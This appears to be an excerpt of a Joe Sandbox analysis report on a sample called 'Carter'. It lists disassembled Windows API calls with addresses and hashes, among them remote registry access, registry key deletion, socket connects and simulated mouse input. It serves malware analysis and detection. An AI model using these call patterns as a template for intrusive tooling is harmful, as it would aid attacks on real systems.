                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002D3B8A,?), ref: 002D4BE0
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002D3B8A,?), ref: 002D4BF9
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 002D3BAA
                                                                            • _wcscmp.LIBCMT ref: 002D3BC6
                                                                            • MoveFileW.KERNEL32(?,?), ref: 002D3BDE
                                                                            • _wcscat.LIBCMT ref: 002D3C26
                                                                            • SHFileOperationW.SHELL32(?), ref: 002D3C92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 1377345388-1173974218
                                                                            • Opcode ID: bc890f6a978de08a60a45f5ef9ebe818a2e890e3383b0f0ae289ec531f13d4a6
                                                                            • Instruction ID: d53b8ee400cac33827c20f10943d53b1f305b3cc7df17b9b69c3d17aa185609e
                                                                            • Opcode Fuzzy Hash: bc890f6a978de08a60a45f5ef9ebe818a2e890e3383b0f0ae289ec531f13d4a6
                                                                            • Instruction Fuzzy Hash: E7416D71528345AAC756EF64D481ADBB7ECAF88340F40092FF489D3291EB34DA588B52
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002F78CF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F7976
                                                                            • IsMenu.USER32(?), ref: 002F798E
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F79D6
                                                                            • DrawMenuBar.USER32 ref: 002F79E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3866635326-4108050209
                                                                            • Opcode ID: 1244e2dd5f2e3d3e27a1bc5ca52f2fe49068ee7587b40348c874392d8a347224
                                                                            • Instruction ID: 3d6e7f155813ea318501c0ef39dcee5a82c297d484897291b061a2a368024e43
                                                                            • Opcode Fuzzy Hash: 1244e2dd5f2e3d3e27a1bc5ca52f2fe49068ee7587b40348c874392d8a347224
                                                                            • Instruction Fuzzy Hash: FF412C75A18209EFDB20DF54D884EEABBF9FB05350F04812DEA559B250D7B0AD60CF90
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002F1631
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002F165B
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 002F1712
                                                                              • Part of subcall function 002F1602: RegCloseKey.ADVAPI32(?), ref: 002F1678
                                                                              • Part of subcall function 002F1602: FreeLibrary.KERNEL32(?), ref: 002F16CA
                                                                              • Part of subcall function 002F1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002F16ED
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 002F16B5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: 7e6846f944bb977de0087ec08b84d081b69e8f33ca02b7f5959d6de2b0a643a0
                                                                            • Instruction ID: 6e0debff0bf987895d1fc024326944d52acc2b8fdaf2a061bf59aa8eeeb8c966
                                                                            • Opcode Fuzzy Hash: 7e6846f944bb977de0087ec08b84d081b69e8f33ca02b7f5959d6de2b0a643a0
                                                                            • Instruction Fuzzy Hash: D7313B7191110DFFEB159F94DC95AFEF7BCEB08340F40016AE606E2140EB709E659AA0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002F6911
                                                                            • GetWindowLongW.USER32(00C65698,000000F0), ref: 002F6944
                                                                            • GetWindowLongW.USER32(00C65698,000000F0), ref: 002F6979
                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002F69AB
                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002F69D5
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002F69E6
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F6A00
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: ec7c615e5b54fa04ed616e7a232ed493cc65a75c780757286928c5c417b9124a
                                                                            • Instruction ID: be02dd0fd58732e54127824400fff0fa09bc9159f69b522549faf26efdb82e96
                                                                            • Opcode Fuzzy Hash: ec7c615e5b54fa04ed616e7a232ed493cc65a75c780757286928c5c417b9124a
                                                                            • Instruction Fuzzy Hash: C531487061415AAFDB22CF58DC99F6477E9FB49790F1801A4F6148F2B1CBB2AC60DB40
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE2CA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE2F0
• SysAllocString.OLEAUT32(00000000), ref: 002CE2F3
• SysAllocString.OLEAUT32(?), ref: 002CE311
• SysFreeString.OLEAUT32(?), ref: 002CE31A
• StringFromGUID2.OLE32(?,?,00000028), ref: 002CE33F
• SysAllocString.OLEAUT32(?), ref: 002CE34D
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: ed2c7148c9d13060aef4f911c4b1c8896445076572da239b7124938a7e9cabc9
• Instruction ID: 8d7ff10daf9c8d610451ee8ede4d4381d728f761722721b4237acb47496bf377
• Opcode Fuzzy Hash: ed2c7148c9d13060aef4f911c4b1c8896445076572da239b7124938a7e9cabc9
• Instruction Fuzzy Hash: 6B21BA35611109AFDF10DFA9CC88EBB77ACEB08360F054169FD14DB250DA70AC418B64
APIs
  • Part of subcall function 002E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002E84A0
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002E68B1
• WSAGetLastError.WSOCK32(00000000), ref: 002E68C0
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002E68F9
• connect.WSOCK32(00000000,?,00000010), ref: 002E6902
• WSAGetLastError.WSOCK32 ref: 002E690C
• closesocket.WSOCK32(00000000), ref: 002E6935
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002E694E
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 7cb3939df1796f4885aa5b4007593c98a6bad4458b5da2d256d2e95aab996202
• Instruction ID: 95de2a2ca1dff542393dae2fae234d22a0883185323eeae6ef84937c2e8c271c
• Opcode Fuzzy Hash: 7cb3939df1796f4885aa5b4007593c98a6bad4458b5da2d256d2e95aab996202
• Instruction Fuzzy Hash: 7631E771250208AFDB10AF65CC89FBE77BDEB44760F448019FD49A7291CB74AC148FA1
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE3A5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE3CB
• SysAllocString.OLEAUT32(00000000), ref: 002CE3CE
• SysAllocString.OLEAUT32 ref: 002CE3EF
• SysFreeString.OLEAUT32 ref: 002CE3F8
• StringFromGUID2.OLE32(?,?,00000028), ref: 002CE412
• SysAllocString.OLEAUT32(?), ref: 002CE420
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 16d85a48a6720e82389c35fb33e203894c5644f4227b68ef1615e0daa9474445
• Instruction ID: 175281472fbae0acea4c18b3f7c7ffdc649150754e88f229d8507b4bb183cecf
• Opcode Fuzzy Hash: 16d85a48a6720e82389c35fb33e203894c5644f4227b68ef1615e0daa9474445
• Instruction Fuzzy Hash: 04218835615105AFDF249FA9DC88EBF77ECEB08360F01822AF915CB260DA74EC518B64
APIs
  • Part of subcall function 00272111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
  • Part of subcall function 00272111: GetStockObject.GDI32(00000011), ref: 00272163
  • Part of subcall function 00272111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002F7C57
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002F7C64
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002F7C6F
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002F7C7E
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002F7C8A
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 269063093abf59776acd8cc289e3c0ababcb024bcc9e15cc0890cac7c8f0137e
• Instruction ID: e56a6365570cb5fae31151963800068a099ee45325a5436734e9e9d409b8505e
• Opcode Fuzzy Hash: 269063093abf59776acd8cc289e3c0ababcb024bcc9e15cc0890cac7c8f0137e
• Instruction Fuzzy Hash: 2F1163B115021DBEEF159F64CC85EE7BF6DEF08798F014125FB08A6050C6729C21DBA4
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00294282,?), ref: 002941D3
• GetProcAddress.KERNEL32(00000000), ref: 002941DA
• EncodePointer.KERNEL32(00000000), ref: 002941E6
• DecodePointer.KERNEL32(00000001,00294282,?), ref: 00294203
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
• Opcode ID: 094c286ee16f9c0160c9679c5e38836172d5a2769f98c00ba238f461f9833ead
• Instruction ID: 97e482e98884fb289399f7d5bd1c4ffc40b79726d3b3109294b8e201d5ae95c7
• Opcode Fuzzy Hash: 094c286ee16f9c0160c9679c5e38836172d5a2769f98c00ba238f461f9833ead
• Instruction Fuzzy Hash: C1E01A74A91741AFDF572F70EC9DB693AACA715B06F604465F401D50F0CBF540858F00
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002941A8), ref: 002942A8
• GetProcAddress.KERNEL32(00000000), ref: 002942AF
• EncodePointer.KERNEL32(00000000), ref: 002942BA
• DecodePointer.KERNEL32(002941A8), ref: 002942D5
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: 3dcd4cdd9dff265045322a03cae57413f3f7c115e15f0e3a2b86f3a6eedfbc55
• Instruction ID: f706d47da2907381c25145de14adecebbc426f49bc91a7c9ca0ee77241fdd965
• Opcode Fuzzy Hash: 3dcd4cdd9dff265045322a03cae57413f3f7c115e15f0e3a2b86f3a6eedfbc55
• Instruction Fuzzy Hash: 6BE0B6749A2701ABDF57AF60AD5DB453A6CBB04B02F504556F401E50F0CBB44614DA10
APIs
• GetClientRect.USER32(?,?), ref: 002721B8
• GetWindowRect.USER32(?,?), ref: 002721F9
• ScreenToClient.USER32(?,?), ref: 00272221
• GetClientRect.USER32(?,?), ref: 00272350
• GetWindowRect.USER32(?,?), ref: 00272369
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 2c7f5d46e3aed909f28bd2b3063946e17edefed0dcb71d61e18c4bd8145a95ed
• Instruction ID: 93da259f0854585ddde1463ccfac8852bd507a89a8fb6192a0e577f9a4a23faf
• Opcode Fuzzy Hash: 2c7f5d46e3aed909f28bd2b3063946e17edefed0dcb71d61e18c4bd8145a95ed
• Instruction Fuzzy Hash: B5B17B3992024ADBDF10CFA8C9807EDB7B1FF08310F148169ED59AB215DB70AA64CB64
APIs
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
• Instruction ID: 48329e97d3d5bd0370363848059c824f5c09fed31afadb1a26c1678fccf64163
• Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
• Instruction Fuzzy Hash: 5C619E3052025AABCF11FF60CC85EBE37A8AF05308F04855AF8996B292DB359D75CF50
APIs
  • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
  • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F091D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002F095D
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002F0980
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002F09A9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 002F09EC
• RegCloseKey.ADVAPI32(00000000), ref: 002F09F9
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: 4a93972cb52f44ade448177b14f3c848edc762a357ddc04c540d2875ba77cf19
• Instruction ID: 22328fe05e091614f567544b270d60f1d0a34d9251bb05d3249b2cfa1df464df
• Opcode Fuzzy Hash: 4a93972cb52f44ade448177b14f3c848edc762a357ddc04c540d2875ba77cf19
• Instruction Fuzzy Hash: 83518B311282059FD714EF24C885E6ABBE8FF84754F04492DF589872A2EB71E925CF52
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 002CF6A2
                                                                            • VariantClear.OLEAUT32(00000013), ref: 002CF714
                                                                            • VariantClear.OLEAUT32(00000000), ref: 002CF76F
                                                                            • _memmove.LIBCMT ref: 002CF799
                                                                            • VariantClear.OLEAUT32(?), ref: 002CF7E6
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002CF814
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                            • String ID:
                                                                            • API String ID: 1101466143-0
                                                                            • Opcode ID: 6c637feb0a416034eb78cfa34bdc1982672792cff9fcc696b7838d30f031c483
                                                                            • Instruction ID: aaa90f431800300c8c30cf9218631347b084e0037960ded1025c1eccebda1ed3
                                                                            • Opcode Fuzzy Hash: 6c637feb0a416034eb78cfa34bdc1982672792cff9fcc696b7838d30f031c483
                                                                            • Instruction Fuzzy Hash: A3515BB5A10209EFDB14CF58C884EAAB7B9FF48314F15856AE949DB300E730E915CFA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D29FF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D2A4A
                                                                            • IsMenu.USER32(00000000), ref: 002D2A6A
                                                                            • CreatePopupMenu.USER32 ref: 002D2A9E
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 002D2AFC
                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002D2B2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: 873ad1fd1de3af0db19dde54e2a339c3c33b10a0106bd9b71685a090f03fb719
                                                                            • Instruction ID: 95afe9ad176ead15bfb62629b7812856115811722e6c3cd2b89e39dbc02250e4
                                                                            • Opcode Fuzzy Hash: 873ad1fd1de3af0db19dde54e2a339c3c33b10a0106bd9b71685a090f03fb719
                                                                            • Instruction Fuzzy Hash: 03519E7062020ADBDF25CF68D888BAEBBF4EF65318F10415BE8119B391D7B09D69CB51
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00271B76
                                                                            • GetWindowRect.USER32(?,?), ref: 00271BDA
                                                                            • ScreenToClient.USER32(?,?), ref: 00271BF7
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00271C08
                                                                            • EndPaint.USER32(?,?), ref: 00271C52
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 1827037458-0
                                                                            • Opcode ID: 1070f0cf0f0dc4059774825c937e471e8f4e17786b0b0021c65c791de2da0993
                                                                            • Instruction ID: fb0dc176b4bb0b1bc8a8ef351eb6fe01b77977d9759b2add87999b2f6a2e5ff8
                                                                            • Opcode Fuzzy Hash: 1070f0cf0f0dc4059774825c937e471e8f4e17786b0b0021c65c791de2da0993
                                                                            • Instruction Fuzzy Hash: E241E3701143059FD722DF28CCC9FBA7BE8EF49324F144569F9988B2A1C7319825DB62
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,002E550C,?,?,00000000,00000001), ref: 002E7796
                                                                              • Part of subcall function 002E406C: GetWindowRect.USER32(?,?), ref: 002E407F
                                                                            • GetDesktopWindow.USER32 ref: 002E77C0
                                                                            • GetWindowRect.USER32(00000000), ref: 002E77C7
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002E77F9
                                                                              • Part of subcall function 002D57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D5877
                                                                            • GetCursorPos.USER32(?), ref: 002E7825
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002E7883
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 49f271463aa4fe487402c0875c2e422ea29c9bd63ccac4d5c506b953dc59ea16
                                                                            • Instruction ID: e8053d891cad17f740cd159a68a97e1f27c9b82ab46cc2f37f3b8a8750af4daf
                                                                            • Opcode Fuzzy Hash: 49f271463aa4fe487402c0875c2e422ea29c9bd63ccac4d5c506b953dc59ea16
                                                                            • Instruction Fuzzy Hash: EE31D072509356ABD724DF14CC49F9BB7AEFF89314F00091AF58997181CA70E918CBA2
                                                                            APIs
                                                                              • Part of subcall function 002C8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C8CDE
                                                                              • Part of subcall function 002C8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C8CE8
                                                                              • Part of subcall function 002C8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C8CF7
                                                                              • Part of subcall function 002C8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C8CFE
                                                                              • Part of subcall function 002C8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C8D14
                                                                            • GetLengthSid.ADVAPI32(?,00000000,002C904D), ref: 002C9482
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002C948E
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002C9495
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 002C94AE
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,002C904D), ref: 002C94C2
                                                                            • HeapFree.KERNEL32(00000000), ref: 002C94C9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: f0cbc9bc4f183e1937f2009becc4c17f8eadfe371c4e562e53a0d55ddca95c17
                                                                            • Instruction ID: dd3451b089032cedf3f853d8e6d10e9200980d779cd05fbea965b9e7f9fcb8fc
                                                                            • Opcode Fuzzy Hash: f0cbc9bc4f183e1937f2009becc4c17f8eadfe371c4e562e53a0d55ddca95c17
                                                                            • Instruction Fuzzy Hash: A911DC76522A05EFDB298FA4CC19FAF7BBDEB45312F10821DE84593210C73699A1CB60
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002C9200
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 002C9207
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002C9216
                                                                            • CloseHandle.KERNEL32(00000004), ref: 002C9221
